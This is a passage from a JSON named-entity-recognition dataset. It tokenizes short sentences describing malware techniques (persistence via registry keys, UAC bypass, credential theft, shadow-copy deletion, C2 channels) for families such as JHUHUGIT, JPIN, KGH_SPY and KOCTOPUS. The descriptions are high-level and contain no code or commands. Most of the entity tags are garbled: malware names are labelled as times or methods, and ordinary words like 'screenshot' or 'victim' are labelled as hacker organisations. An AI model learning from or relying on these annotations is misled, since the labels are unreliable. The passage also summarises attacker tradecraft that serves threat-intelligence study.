"ner_tags": [ "B-Idus", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ixeshe", "enumerates", "the", "IP", "address,", "network", "proxy", "settings,", "and", "domain", "name", "from", "a", "victim's", "system." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ixeshe", "collects", "the", "username", "from", "the", "victim’s", "machine." ], "ner_tags": [ "B-Idus", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ixeshe", "can", "list", "running", "services." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Ixeshe", "uses", "HTTP", "for", "command", "and", "control." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Ixeshe", "is", "capable", "of", "executing", "commands", "via", "cmd." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "I-Features", "I-Features", "O", "B-SamFile" ] }, { "tokens": [ "JCry", "has", "encrypted", "files", "and", "demanded", "Bitcoin", "to", "decrypt", "those", "files." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "JCry", "has", "been", "observed", "deleting", "shadow", "copies", "to", "ensure", "that", "data", "cannot", "be", "restored", "easily." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "JCry", "has", "achieved", "execution", "by", "luring", "users", "to", "click", "on", "a", "file", "that", "appeared", "to", "be", "an", "Adobe", "Flash", "Player", "update", "installer." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "JCry", "has", "used", "PowerShell", "to", "execute", "payloads." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "JCry", "has", "created", "payloads", "in", "the", "Startup", "directory", "to", "maintain", "persistence." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "JCry", "has", "used", "VBS", "scripts." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "JCry", "has", "used", "<code>cmd.exe</code>", "to", "launch", "PowerShell." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "A", "JHUHUGIT", "variant", "accesses", "a", "screenshot", "saved", "in", "the", "clipboard", "and", "converts", "it", "to", "a", "JPG", "image." ], "ner_tags": [ "O", "B-Way", "O", "B-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "JHUHUGIT", "has", "used", "COM", "hijacking", "to", "establish", "persistence", "by", "hijacking", "a", "class", "named", "MMDeviceEnumerator", "and", "also", "by", "registering", "the", "payload", "as", "a", "Shell", "Icon", "Overlay", "handler", "COM", "object", "({3543619C-D563-43f7-95EA-4DA7E1CC396A})." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Many", "strings", "in", "JHUHUGIT", "are", "obfuscated", "with", "a", "XOR", "algorithm." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "JHUHUGIT", "has", "exploited", "CVE-2015-1701", "and", "CVE-2015-2387", "to", "escalate", "privileges." ], "ner_tags": [ "B-Idus", "O", "O", "B-Features", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "JHUHUGIT", "tests", "if", "it", "can", "reach", "its", "C2", "server", "by", "first", "attempting", "a", "direct", "connection,", "and", "if", "it", "fails,", "obtaining", "proxy", "settings", "and", "sending", "the", "connection", "through", "a", "proxy,", "and", "finally", "injecting", "code", "into", "a", "running", "browser", "if", "the", "proxy", "method", "fails." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "JHUHUGIT", "dropper", "can", "delete", "itself", "from", "the", "victim.", "Another", "JHUHUGIT", "variant", "has", "the", "capability", "to", "delete", "specified", "files." ], "ner_tags": [ "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "JHUHUGIT", "can", "retrieve", "an", "additional", "payload", "from", "its", "C2", "server.", "JHUHUGIT", "has", "a", "command", "to", "download", "files", "to", "the", "victim’s", "machine." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "JHUHUGIT", "has", "registered", "a", "Windows", "shell", "script", "under", "the", "Registry", "key", "<code>HKCU\\Environment\\UserInitMprLogonScript</code>", "to", "establish", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "JHUHUGIT", "obtains", "a", "list", "of", "running", "processes", "on", "the", "victim." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "JHUHUGIT", "performs", "code", "injection", "injecting", "its", "own", "functions", "to", "browser", "processes." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "JHUHUGIT", "has", "used", "a", "Registry", "Run", "key", "to", "establish", "persistence", "by", "executing", "JavaScript", "code", "within", "the", "rundll32.exe", "process." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "JHUHUGIT", "is", "executed", "using", "rundll32.exe." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "JHUHUGIT", "has", "registered", "itself", "as", "a", "scheduled", "task", "to", "run", "each", "time", "the", "current", "user", "logs", "in." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "A", "JHUHUGIT", "variant", "takes", "screenshots", "by", "simulating", "the", "user", "pressing", "the", "\"Take", "Screenshot\"", "key", "(VK_SCREENSHOT),", "accessing", "the", "screenshot", "saved", "in", "the", "clipboard,", "and", "converting", "it", "to", "a", "JPG", "image." ], "ner_tags": [ "O", "B-Way", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "B-HackOrg", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "A", "JHUHUGIT", "variant", "encodes", "C2", "POST", "data", "base64." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "JHUHUGIT", "obtains", "a", "build", "identifier", "as", "well", "as", "victim", "hard", "drive", "information", "from", "Windows", "registry", "key", "<code>HKLM\\SYSTEM\\CurrentControlSet\\Services\\Disk\\Enum</code>.", "Another", "JHUHUGIT", "variant", "gathers", "the", "victim", "storage", "volume", "serial", "number", "and", "the", "storage", "device", "name." ], "ner_tags": [ "B-Way", "B-Features", "B-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "A", "JHUHUGIT", "variant", "gathers", "network", "interface", "card", "information." ], "ner_tags": [ "O", "B-Way", "O", "B-Features", "I-Features", "I-Features", "I-Features", "O" ] }, { "tokens": [ "JHUHUGIT", "variants", "have", "communicated", "with", "C2", "servers", "over", "HTTP", "and", "HTTPS." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "JHUHUGIT", "uses", "a", ".bat", "file", "to", "execute", "a", ".dll." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "B-Way" ] }, { "tokens": [ "JHUHUGIT", "has", "registered", "itself", "as", "a", "service", "to", "establish", "persistence." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "A", "JPIN", "variant", "downloads", "the", "backdoor", "payload", "via", "the", "BITS", "service." ], "ner_tags": [ "O", "B-SamFile", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "JPIN", "can", "lower", "security", "settings", "by", "changing", "Registry", "keys." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "I-Way", "O", "B-Way" ] }, { "tokens": [ "JPIN's", "installer/uninstaller", "component", "deletes", "itself", "if", "it", "encounters", "a", "version", "of", "Windows", "earlier", "than", "Windows", "XP", "or", "identifies", "security-related", "processes", "running." ], "ner_tags": [ "B-Way", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "JPIN", "can", "communicate", "over", "FTP." ], "ner_tags": [ "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "JPIN", "can", "enumerate", "drives", "and", "their", "types.", "It", "can", "also", "change", "file", "permissions", "using", "cacls.exe." ], "ner_tags": [ "B-Way", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "B-HackOrg", "O", "B-SamFile" ] }, { "tokens": [ "JPIN", "can", "download", "files", "and", "upgrade", "itself." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "I-Features", "O" ] }, { "tokens": [ "JPIN", "contains", "a", "custom", "keylogger." ], "ner_tags": [ "B-Way", "O", "O", "I-Tool", "O" ] }, { "tokens": [ "JPIN", "can", "obtain", "the", "permissions", "of", "the", "victim", "user." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "JPIN", "can", "send", "email", "over", "SMTP." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "A", "JPIN", "uses", "a", "encrypted", "and", "compressed", "payload", "that", "is", "disguised", "as", "a", "bitmap", "within", "the", "resource", "section", "of", "the", "installer." ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "JPIN", "can", "list", "running", "processes." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "JPIN", "can", "inject", "content", "into", "lsass.exe", "to", "load", "a", "module." ], "ner_tags": [ "B-Idus", "O", "B-Features", "I-Features", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "JPIN", "can", "enumerate", "Registry", "keys." ], "ner_tags": [ "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "JPIN", "checks", "for", "the", "presence", "of", "certain", "security-related", "processes", "and", "deletes", "its", "installer/uninstaller", "component", "if", "it", "identifies", "any", "of", "them." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "JPIN", "can", "obtain", "system", "information", "such", "as", "OS", "version", "and", "disk", "space." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "JPIN", "can", "obtain", "network", "information,", "including", "DNS,", "IP,", "and", "proxies." ], "ner_tags": [ "B-Idus", "O", "O", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "JPIN", "can", "obtain", "the", "victim", "user", "name." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "JPIN", "can", "list", "running", "services." ], "ner_tags": [ "B-Idus", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "JPIN", "can", "use", "the", "command-line", "utility", "cacls.exe", "to", "change", "file", "permissions." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "JPIN", "can", "use", "the", "command-line", "utility", "cacls.exe", "to", "change", "file", "permissions." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "JSS", "Loader", "has", "the", "ability", "to", "download", "malicious", "executables", "to", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "I-Features", "B-HackOrg", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "JSS", "Loader", "can", "download", "and", "execute", "JavaScript", "files." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "B-Features", "O", "I-Features", "B-HackOrg", "B-Features" ] }, { "tokens": [ "JSS", "Loader", "has", "been", "executed", "through", "malicious", "attachments", "contained", "in", "spearphishing", "emails." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "JSS", "Loader", "has", "the", "ability", "to", "download", "and", "execute", "PowerShell", "scripts." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "B-Features", "O", "I-Features", "B-HackOrg", "B-Features" ] }, { "tokens": [ "JSS", "Loader", "has", "the", "ability", "to", "launch", "scheduled", "tasks", "to", "establish", "persistence." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "JSS", "Loader", "has", "been", "delivered", "by", "phishing", "emails", "containing", "malicious", "Microsoft", "Excel", "attachments." ], "ner_tags": [ "B-Way", "B-SecTeam", "O", "O", "O", "O", "B-Way", "I-Way", "O", "O", "I-Way", "O", "B-Way" ] }, { "tokens": [ "JSS", "Loader", "can", "download", "and", "execute", "VBScript", "files." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "B-Features", "O", "I-Features", "B-HackOrg", "B-Features" ] }, { "tokens": [ "Janicab", "captured", "audio", "and", "sent", "it", "out", "to", "a", "C2", "server." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Janicab", "used", "a", "valid", "AppleDeveloperID", "to", "sign", "the", "code", "to", "get", "past", "security", "restrictions." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Janicab", "used", "a", "cron", "job", "for", "persistence", "on", "Mac", "devices." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Janicab", "captured", "screenshots", "and", "sent", "them", "out", "to", "a", "C2", "server." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Javali", "can", "use", "large", "obfuscated", "libraries", "to", "hinder", "detection", "and", "analysis." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Javali", "can", "capture", "login", "credentials", "from", "open", "browsers", "including", "Firefox,", "Chrome,", "Internet", "Explorer,", "and", "Edge." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "B-Features", "O", "O", "O", "O", "B-Way", "B-Way", "I-Tool", "O", "O", "B-Tool" ] }, { "tokens": [ "Javali", "can", "use", "DLL", "side-loading", "to", "load", "malicious", "DLLs", "into", "legitimate", "executables." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Javali", "can", "read", "C2", "information", "from", "Google", "Documents", "and", "YouTube." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Javali", "can", "download", "payloads", "from", "remote", "C2", "servers." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "Javali", "has", "achieved", "execution", "through", "victims", "opening", "malicious", "attachments,", "including", "MSI", "files", "with", "embedded", "VBScript." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Javali", "has", "achieved", "execution", "through", "victims", "clicking", "links", "to", "malicious", "websites." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Javali", "has", "used", "the", "MSI", "installer", "to", "download", "and", "execute", "malicious", "payloads." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Javali", "can", "monitor", "processes", "for", "open", "browsers", "and", "custom", "banking", "applications." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Javali", "has", "been", "delivered", "as", "malicious", "e-mail", "attachments." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Javali", "has", "been", "delivered", "via", "malicious", "links", "embedded", "in", "e-mails." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Javali", "has", "used", "embedded", "VBScript", "to", "download", "malicious", "payloads", "from", "C2." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KARAE", "can", "use", "public", "cloud-based", "storage", "providers", "for", "command", "and", "control." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KARAE", "was", "distributed", "through", "torrent", "file-sharing", "websites", "to", "South", "Korean", "victims,", "using", "a", "YouTube", "video", "downloader", "application", "as", "a", "lure." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "I-Area", "I-Area", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KARAE", "can", "upload", "and", "download", "files,", "including", "second-stage", "malware." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "KARAE", "can", "collect", "system", "information." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "KEYMARBLE", "has", "the", "capability", "to", "delete", "files", "off", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "KEYMARBLE", "has", "a", "command", "to", "search", "for", "files", "on", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "KEYMARBLE", "can", "upload", "files", "to", "the", "victim’s", "machine", "and", "can", "download", "additional", "payloads." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "B-HackOrg" ] }, { "tokens": [ "KEYMARBLE", "has", "a", "command", "to", "create", "Registry", "entries", "for", "storing", "data", "under", "<code>HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\WABE\\DataPath</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "B-SamFile" ] }, { "tokens": [ "KEYMARBLE", "can", "obtain", "a", "list", "of", "running", "processes", "on", "the", "system." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KEYMARBLE", "can", "capture", "screenshots", "of", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "KEYMARBLE", "uses", "a", "customized", "XOR", "algorithm", "to", "encrypt", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "B-Features", "O", "B-Features" ] }, { "tokens": [ "KEYMARBLE", "has", "the", "capability", "to", "collect", "the", "computer", "name,", "language", "settings,", "the", "OS", "version,", "CPU", "information,", "disk", "devices,", "and", "time", "elapsed", "since", "system", "start." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KEYMARBLE", "gathers", "the", "MAC", "address", "of", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "B-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "KEYMARBLE", "can", "execute", "shell", "commands", "using", "cmd.exe." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "KEYPLUG", "can", "use", "TLS-encrypted", "WebSocket", "Protocol", "(WSS)", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Tool", "I-Tool", "B-Way", "O", "O" ] }, { "tokens": [ "The", "KEYPLUG", "Windows", "variant", "has", "retrieved", "C2", "addresses", "from", "encoded", "data", "in", "posts", "on", "tech", "community", "forums." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Org", "I-Org", "O" ] }, { "tokens": [ "KEYPLUG", "can", "decode", "its", "configuration", "file", "to", "determine", "C2", "protocols." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KEYPLUG", "can", "use", "a", "hardcoded", "one-byte", "XOR", "encoded", "configuration", "file." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KEYPLUG", "can", "use", "TCP", "and", "KCP", "(KERN", "Communications", "Protocol)", "over", "UDP", "for", "C2", "communication." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "KEYPLUG", "has", "used", "Cloudflare", "CDN", "associated", "infrastructure", "to", "redirect", "C2", "communications", "to", "malicious", "domains." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KEYPLUG", "can", "obtain", "the", "current", "tick", "count", "of", "an", "infected", "computer." ], "ner_tags": [ "B-Idus", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KEYPLUG", "has", "the", "ability", "to", "communicate", "over", "HTTP", "and", "WebSocket", "Protocol", "(WSS)", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "B-Tool", "B-Way", "O", "O" ] }, { "tokens": [ "KGH_SPY", "can", "collect", "credentials", "from", "WINSCP." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O" ] }, { "tokens": [ "KGH_SPY", "has", "the", "ability", "to", "steal", "data", "from", "the", "Chrome,", "Edge,", "Firefox,", "Thunderbird,", "and", "Opera", "browsers." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "B-Tool", "B-Way", "B-Way", "O", "I-Tool", "O" ] }, { "tokens": [ "KGH_SPY", "can", "send", "a", "file", "containing", "victim", "system", "information", "to", "C2." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KGH_SPY", "can", "decrypt", "encrypted", "strings", "and", "write", "them", "to", "a", "newly", "created", "folder." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KGH_SPY", "has", "used", "encrypted", "strings", "in", "its", "installer." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "KGH_SPY", "can", "exfiltrate", "collected", "information", "from", "the", "host", "to", "the", "C2", "server." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KGH_SPY", "can", "enumerate", "files", "and", "directories", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KGH_SPY", "has", "the", "ability", "to", "download", "and", "execute", "code", "from", "remote", "servers." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "KGH_SPY", "can", "perform", "keylogging", "by", "polling", "the", "<code>GetAsyncKeyState()</code>", "function." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KGH_SPY", "can", "save", "collected", "system", "information", "to", "a", "file", "named", "\"info\"", "before", "exfiltration." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KGH_SPY", "can", "harvest", "data", "from", "mail", "clients." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "KGH_SPY", "has", "the", "ability", "to", "set", "the", "<code>HKCU\\Environment\\UserInitMprLogonScript</code>", "Registry", "key", "to", "execute", "logon", "scripts." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KGH_SPY", "has", "been", "spread", "through", "Word", "documents", "containing", "malicious", "macros." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Tool", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "KGH_SPY", "has", "masqueraded", "as", "a", "legitimate", "Windows", "tool." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KGH_SPY", "can", "execute", "PowerShell", "commands", "on", "the", "victim's", "machine." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "KGH_SPY", "can", "collect", "information", "on", "installed", "applications." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "KGH_SPY", "can", "collect", "drive", "information", "from", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "KGH_SPY", "can", "send", "data", "to", "C2", "with", "HTTP", "POST", "requests." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KGH_SPY", "has", "the", "ability", "to", "set", "a", "Registry", "key", "to", "run", "a", "cmd.exe", "command." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "KGH_SPY", "can", "collect", "credentials", "from", "the", "Windows", "Credential", "Manager." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KOCTOPUS", "will", "perform", "UAC", "bypass", "either", "through", "fodhelper.exe", "or", "eventvwr.exe." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "KOCTOPUS", "can", "delete", "created", "registry", "keys", "used", "for", "persistence", "as", "part", "of", "its", "cleanup", "procedure." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KOCTOPUS", "has", "obfuscated", "scripts", "with", "the", "BatchEncryption", "tool." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "KOCTOPUS", "has", "deobfuscated", "itself", "before", "executing", "its", "commands." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KOCTOPUS", "will", "attempt", "to", "delete", "or", "disable", "all", "Registry", "keys", "and", "scheduled", "tasks", "related", "to", "Microsoft", "Security", "Defender", "and", "Security", "Essentials." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-SecTeam", "I-SecTeam", "I-SecTeam", "O", "O", "B-SecTeam" ] }, { "tokens": [ "KOCTOPUS", "has", "used", "<code>-WindowsStyle", "Hidden</code>", "to", "hide", "the", "command", "window." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "KOCTOPUS", "has", "executed", 